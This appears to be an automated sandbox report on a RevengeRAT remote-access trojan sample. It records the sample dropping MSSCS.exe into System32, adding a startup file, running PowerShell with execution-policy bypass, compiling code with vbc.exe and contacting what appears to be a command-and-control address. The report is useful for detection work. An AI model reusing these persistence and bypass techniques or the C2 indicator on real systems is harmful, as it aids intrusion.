SHA512 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

memory/3596-39287-0x0000000000400000-0x0000000000450000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 bd74a3c50fd08981e89d96859e176d68
SHA1 0a98b96aefe60b96722d587b7c3aabcd15927618
SHA256 ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837
SHA512 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e

memory/11876-39318-0x0000000000400000-0x0000000000452000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

MD5 3d2c6861b6d0899004f8abe7362f45b7
SHA1 33855b9a9a52f9183788b169cc5d57e6ad9da994
SHA256 dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064
SHA512 19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

Analysis: behavioral13

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

144s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\MSSCS.exe N/A

Uses the VBS compiler for execution

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\MSSCS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3408 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 3408 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 4212 wrote to memory of 2940 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4212 wrote to memory of 2940 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4212 wrote to memory of 4520 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 4520 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4520 wrote to memory of 4288 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4520 wrote to memory of 4288 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 1696 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 1696 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1696 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1696 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 2944 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 2944 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2944 wrote to memory of 4400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2944 wrote to memory of 4400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 2208 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 2208 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2208 wrote to memory of 4344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2208 wrote to memory of 4344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 1952 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 1952 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1952 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1952 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3576 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3576 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3576 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3576 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3796 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3796 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3796 wrote to memory of 1448 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3796 wrote to memory of 1448 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3504 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3504 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3504 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3504 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 4468 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 4468 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4468 wrote to memory of 4028 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4468 wrote to memory of 4028 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

C:\Windows\system32\MSSCS.exe

"C:\Windows\system32\MSSCS.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -Command [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Isto abriu lol','Rekt!',0,64)

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4evrteeg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFE0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc732A545F924041B38D38D7A828C9D8C.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE4E7C281185448C8A43147CFBB28F3A5.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\axigtgvo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC167.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9089C0FBDB5A48B0B2E9E33C5C1EAE99.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\liy_xgy4.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEDF6394837BA4324A37AD2AAE76AEDC1.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rju4dzrb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC251.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc67486D9BF9294623B4AD83C36D1E1D.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD329D59D2F6D42AFAD8535CFB2EC5ACD.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xu5pvkll.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC32C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc565B70BBEBD84010845AE8A2151BC092.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cenbx5ag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC38A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc559B5FCBF6CC4B9999B01A341FBA5215.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qh0h2jip.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3E7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc93BAD35C841C4E63B4E3EDF5D06D1FD7.TMP"

Network

Country Destination Domain Proto
PT 84.91.119.105:333 tcp
GB 88.221.135.33:443 www.bing.com tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp

Files

memory/3408-0-0x00007FFEC9AA5000-0x00007FFEC9AA6000-memory.dmp

memory/3408-1-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-2-0x000000001C0F0000-0x000000001C5BE000-memory.dmp

memory/3408-3-0x000000001C5C0000-0x000000001C666000-memory.dmp

memory/3408-4-0x000000001C740000-0x000000001C7A2000-memory.dmp

memory/3408-5-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-6-0x000000001CFC0000-0x000000001D05C000-memory.dmp

memory/3408-7-0x00007FFEC9AA5000-0x00007FFEC9AA6000-memory.dmp

memory/3408-8-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-9-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

C:\Windows\System32\MSSCS.exe

MD5 6fe3fb85216045fdf8186429c27458a7
SHA1 ef2c68d0b3edf3def5d90f1525fe87c2142e5710
SHA256 905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550
SHA512 d2180f2d7ca35362a2dc322801fb0eee22820f2ac317c0be4c788c31d3939d30c9b356bf8daf0746545fb66092471f46f5d47c40403ed68b09415fcca90a125c

memory/4212-18-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-20-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-22-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-21-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-23-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/2940-37-0x0000018D74450000-0x0000018D74472000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmlidntb.qq4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\4evrteeg.cmdline

MD5 178590190de696ef08e2d14cb2c2eb91
SHA1 dd0fa8ddb746a92969d5f4b136b15153f33f92c0
SHA256 e402c58e44c9aa4ab12603c2039fb53944f77044c2a5bcf5196e7b579cee2aec
SHA512 bc7eeb662778f2c84b5ad125c222c85839d0f6f49e52468654a1380f7f4fbc1980dd6527648a54aad4ffbd1ef9b370d6239d0a88e0cf28a2fa6c6f4f59bbc5db

C:\Users\Admin\AppData\Local\Temp\4evrteeg.0.vb

MD5 076803692ac8c38d8ee02672a9d49778
SHA1 45d2287f33f3358661c3d6a884d2a526fc6a0a46
SHA256 5b3ab23bcadaeb54a41bdb1636bcaf7772af028d375f42baeb967de6579ef2a3
SHA512 cc9126384a287ccb99d10d5c2d3034cdbc8a45e94f1cec48dd95f2aa08ebbe3053ffd6d6effa31f2d84164edbb6136398cd02c08b05f027a6a777dffd1daea5d

C:\Users\Admin\AppData\Local\Temp\vbc732A545F924041B38D38D7A828C9D8C.TMP

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESBFE0.tmp

MD5 01a1757c3f09178ea151597395d2515d
SHA1 eebe5311e19045252d1c59a94fbe0d337d762e3a
SHA256 9dbae67ff74a4fac8aa55c152b0a85fefb36f07b37e3c5c350478eedcece867e
SHA512 d03ca6f31f9adcc7cc5cc12530a8627c3e998f8023f93b55e83725f903b0c3a373c599655da2ce79854998a33977cc0e1d04829a0cd0053c93f8df7eda33d525

C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.cmdline

MD5 5d5003c90ff46620a67823a0c079a0fe
SHA1 df74b88c1224ae8bb9ff77a34e990bd0a80404b0
SHA256 059c5765bda1a233f792918bdb5ed7f188c2a316bc50563d06621e1d2cdd9a64
SHA512 e6088d2b7b1055ce77f177be2def6d91e35c165901cd221cbafce72ba76540f19a891d050614318b2ced18777d5a3629872315410994153d5dc76fffd0153b6b

C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.0.vb

MD5 88cc385da858aaa7057b54eaeb0df718
SHA1 b108224d4686b5ca3faaeb1c728dfba8740a6eca
SHA256 08a30db98d970e3b6819d5ecff6eab2211ce93f4cd000c09db96ffb294d05020
SHA512 4787835240c3e2364172ac2e7649ec8fecb907c7006c38734e59aa65509f360b4596d5db8de20e0c7388a022e1c2f4f9ba75acabba798bea1d40f688539b7df7

C:\Users\Admin\AppData\Local\Temp\vbcE4E7C281185448C8A43147CFBB28F3A5.TMP

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESC0BB.tmp

MD5 bdb44d2ed3a921221457fc3fa8386f94
SHA1 8196388e2dee5676dd1541bd81fca6a4cbd60eaa
SHA256 8b0f06228f7d15dfb461cf05ad9852712add49823ea4bc0f5075d9fbc040e618
SHA512 19af0af03d204d22221216ffc67dc424d1298f310da98e02d4d65a38405cf88f9735d2769d930da0c0b92e41996e159a0ed459bf630f25faf851468c9fcd486e

C:\Users\Admin\AppData\Local\Temp\axigtgvo.cmdline

MD5 d04581fbb8370acd3a3b7fe191143755
SHA1 c7eeeb0189fe99ea0ea6c5cb7a1b7b1a4799af6f
SHA256 fddd6c3571aea652a1711dd2b4e058f3ed11e035f64d241c980aa2ad854e58a6
SHA512 34d3550acf6a8343165ac2c0fa1584a4c9e6e2d557aa1b977826db81d3596c847e6d85e78d55ee3a6ead4aa798092c4c3d8b1b4dcf55a253207d6125361f14c4

C:\Users\Admin\AppData\Local\Temp\axigtgvo.0.vb

MD5 ac972015bef75b540eb33503d6e28cc2
SHA1 5c1d09fcf4c719711532dcfd0544dfc6f2b90260
SHA256 fa445cc76cde3461a5f1f1281fefcb0c7db69b2685f8a67a06a0f33a067e74e7
SHA512 36b2e1f7b7a6f2c60788f88d95bfdc53b7d261c203eb637a36fbd07d81bc46edc87e528f1987df73963cb75ca2f19c3a4b3df9ade52d5768ecec23753099cc83

C:\Users\Admin\AppData\Local\Temp\RESC167.tmp

MD5 08466d64ad0e59af8b96a7fa57b5105c
SHA1 7269e8d4d50840fd370621c5738479bcaff65a90
SHA256 0f86bdaf64028bbd7794404245db5bcf18ad9f343a652202e70ed14ff6608c2c
SHA512 727ce06d2394ddf3f4411f1ee2f929b9c3423115e85cca2c10e451edf76d8374f8016ba383f3b3f13e4184dd91f7f63ca8434149615377903b563496e0c0e81d

C:\Users\Admin\AppData\Local\Temp\liy_xgy4.cmdline

MD5 9ac443749eb7b5be4c18391a35d6a5c9
SHA1 385164dcf8bdea1266e470c4afd4cca6faf9f732
SHA256 832d1ae363f2fd38a429bbea7f3e5ba4d51c8809d634b01f77e1399b5c27c767
SHA512 6c5b80a38ea767357cec1989b6f94436ea85547b0c9135cfe04ca019d476203207d615e2d1d5918bf4f9ab267c1fcb1135e166604fda931aae6c74ba19ea7405

C:\Users\Admin\AppData\Local\Temp\liy_xgy4.0.vb

MD5 2b3aac520562a93ebef6a5905d4765c9
SHA1 10ab45c5d73934b16fac5e30bf22f17d3e0810c8
SHA256 b9f0edf067faaaa7da2d47e3d22b957cd302eb25e01e08ea79c664868f328f89
SHA512 9514934ed12d93ea3ad4e6873cf294bafa114bc7a784a93b14dd2410d07fae3a2c00308035a5c129c57e283de8b94ed36fd9f9de35b08eb79a82a0c732e50446

C:\Users\Admin\AppData\Local\Temp\vbcEDF6394837BA4324A37AD2AAE76AEDC1.TMP

MD5 85c61c03055878407f9433e0cc278eb7
SHA1 15a60f1519aefb81cb63c5993400dd7d31b1202f
SHA256 f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b
SHA512 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756

C:\Users\Admin\AppData\Local\Temp\RESC1E4.tmp

MD5 15d4533ec04e030b5f84611da2f54a5c
SHA1 4269cae17956c94717af6cd900a73ef13439c780
SHA256 e8ca2fd51c0767ae8f007cde49ad6308765634c56dfec97d493b95ee09e7b016
SHA512 56d31a0e149141db3d325c658917afc692608b7956a0adafa2b0830033ee00d4c12efa449745cac0627b13122fdbaa6e5cc27efa3b35b6fb61b21196b713ceb5

C:\Users\Admin\AppData\Local\Temp\rju4dzrb.cmdline

MD5 d9bc14af5b5228b5f8828ab36446ff77
SHA1 f03d0b6637f66c161383f0e13ed5176a916a22ba
SHA256 93d28aa0db80fd457f1db22f15c499af4608754a2dbbb87bc8a93c034b4bb05b
SHA512 1e84656bdcf708adb3894af0c0443f70a406acbe29634898ec69c3b9b7dc39c59bf80c1b8a384c1fd1828a262febcde8b6e2ba62709f86c9662859ec6b06f0c9

C:\Users\Admin\AppData\Local\Temp\rju4dzrb.0.vb

MD5 325f27ef75bebe8b3f80680add1943d3
SHA1 1c48e211258f8887946afb063e9315b7609b4ee3
SHA256 034c75813491d628a1a740b45888fc0c301b915456aaa7ba6433b4f1368cda35
SHA512 e2165b425558872897990953c26e48776f45751a53da035f1ad86ac062ec23a2923b984d84f992de5c0170f6e192feb155ffff25f51bc76ab273b996daacb804

C:\Users\Admin\AppData\Local\Temp\RESC251.tmp

MD5 7d9a89c0be91fd9ea535182ba06bdcbf
SHA1 846b8a54b26064bedc2c673d98a8dd92bc1fb437
SHA256 2e976e7721f53568c89b0cbfa49b147d750a918d34f0d300b85adfa3045253f3
SHA512 ca6e9ce9612fa96669652b4fcb9c06cabc9c3b523be645f145f9b530d9017e9b9ec0e1dfe7be8e85569da8691ed7b6e8211e6fb21d98929e0c85555bdf194f91

C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.cmdline

MD5 f61283eb4317449dc9357cd06058186b
SHA1 2290f6253815ff227d1419694d93ab7f197c4ef6
SHA256 f198b99c8300c1dc3ff7c08c451499c8efb0410a074134eec6a3a31ed93d5b1f
SHA512 8638624e53de4bef54a350dfa8381e29c3f7b4b596946817e91c53373ab20a966456aa98bd7dfd1367201420869061e5b85b5a7194a0c830127120d94b85b881

C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.0.vb

MD5 539683c4ca4ee4dc46b412c5651f20f5
SHA1 564f25837ce382f1534b088cf2ca1b8c4b078aed
SHA256 ec2210924d5c1af6377ef4bdf76d6ca773aaa1ae0438b0850f44d8c4e16ef92e
SHA512 df7c1a55e53f9b9bf23d27762d2d1163c78808e9b4d95e98c84c55ca4ecb7009ed58574ae6ddede31459f300483a1dc42987295a04f6c8702f297d3f1942f4ac

C:\Users\Admin\AppData\Local\Temp\vbcD329D59D2F6D42AFAD8535CFB2EC5ACD.TMP

MD5 8135713eeb0cf1521c80ad8f3e7aad22
SHA1 1628969dc6256816b2ab9b1c0163fcff0971c154
SHA256 e14dd88df69dc98be5bedcbc8c43d1e7260b4492899fec24d964000a3b096c7a
SHA512 a0b7210095767b437a668a6b0bcedf42268e80b9184b9910ed67d665fba9f714d06c06bff7b3da63846791d606807d13311946505776a1b891b39058cfb41bd4

C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp

MD5 03078f9ae7273690ac46e24f88a8b7f1
SHA1 0c8f0d275e62a9eacae5ba7309cd771ffdc00126
SHA256 196875acc3af69d520ed1c65c289536ab77962cebd4068191b9080375390c72e
SHA512 b8ca8144637b565ada64a56433803f054a30682076f2cd756703800c13fcfbe4a5797f8eb848f3986e5464dcee628d6b3c30ab6e448ab92d1b10a8e79071bac7

C:\Users\Admin\AppData\Local\Temp\xu5pvkll.cmdline

MD5 7282e010f83ff48a31bfab8e0f8c5ffb
SHA1 7e980279b38687d96f142d3e0117baeb3019eb3a
SHA256 80ccfd5ba4d1043425565f501cd7b5fab0f327c2ab31d826e7c65ab890da0e0a
SHA512 4dd6cf0e856166021db7a7fb91e8f1082c04ff1bf2b0a805b72c693b7464c82fbd5ed0087175787fc22ac558e57b1ac75fabe22d2909ddca50c88bbad1a990c7

C:\Users\Admin\AppData\Local\Temp\xu5pvkll.0.vb

MD5 5ce3977a153152978fa71f8aa96909e9
SHA1 52af143c553c92afc257f0e0d556908eaa8919cb
